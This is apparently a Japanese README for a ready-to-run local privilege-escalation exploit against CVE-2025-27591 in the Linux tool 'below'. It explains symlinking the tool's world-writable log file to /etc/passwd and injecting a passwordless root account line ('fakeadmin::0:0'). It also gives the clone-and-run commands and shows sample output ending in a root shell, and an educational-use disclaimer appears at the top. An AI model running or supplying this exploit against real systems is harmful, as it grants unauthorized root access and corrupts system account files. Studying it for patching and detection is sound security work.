
🔥 CVE-2025-27591 に対するローカル権限昇格エクスプロイト | Below のワールド書き込み可能なログディレクトリを悪用し、/etc/passwd インジェクションを介して root を取得する
belowにおけるシンボリックリンク悪用による権限昇格🛑 免責事項: このエクスプロイトは教育目的および許可されたセキュリティテストのみのために提供されています。無断使用は違法となる可能性があります。
below は Facebook が開発した Linux システム向けのパフォーマンス監視ツールです。パッチ適用前のバージョンの below は、全ユーザー書き込み可能なログディレクトリと未サニタイズのログ処理を悪用することで、非特権ユーザーが root に昇格できる重大な脆弱性の影響を受けます。
| フィールド | 値 |
|---|---|
| CVE-ID | CVE-2025-27591 |
| 深刻度 | 🔥 重大 (CVSS ≈ 7.8 - 8.8) |
| 攻撃ベクトル | ローカル |
| 影響 | root (UID=0) への権限昇格 |
| エクスプロイトタイプ | シンボリックリンク悪用 / ログファイルインジェクション |
| 影響を受けるアプリケーション | below – 通常 /usr/bin/below にインストールされます |
| 根本原因 | 権限チェックなしで /var/log/below/ への安全でないファイル書き込み |
この Bash スクリプトは以下の処理を行います:
全ユーザー書き込み可能ディレクトリの確認:
/var/log/below が全ユーザー書き込み可能かどうかを確認します(危険信号)。シンボリックリンク攻撃の準備:
error_root.log があれば削除し、/etc/passwd へのシンボリックリンクを作成します。ペイロードの構築:
/etc/passwd に偽の root ユーザーを追加します:
fakeadmin::0:0:fakeadmin:/root:/bin/bash
ログのトリガー:
sudo below record を実行して、脆弱なバイナリにログを書き込ませます。root アクセスの獲得:
su fakeadmin を使用して、パスワードプロンプトなしで root シェルを取得します。CVE-2025-27591/
├── exploit.sh
├── README.md
エクスプロイトを実行する前に、以下の要件を満たしていることを確認してください:
/usr/bin/below/var/log/belowsudo 権限: sudo below recordln (シンボリックリンク作成用)su (ユーザー切り替え用)timeout (実行時間制御用)whoami (権限確認用)# 1. リポジトリをクローン
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591
# 2. スクリプトに実行権限を付与
chmod +x exploit.sh
# 3. エクスプロイトを実行
./exploit.sh
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] Found existing log file: removing it...
[+] Created symlink: /var/log/below/error_root.log -> /etc/passwd
[*] Writing malicious line to /tmp/fakeadmin
[*] Triggering logging via 'sudo below record'...
[+] 'below record' executed (or timed out)
[*] Attempting to write payload to /etc/passwd via symlink...
[+] Payload successfully appended.
[*] Trying to switch to root shell using 'su fakeadmin'...
root@target:/# whoami
root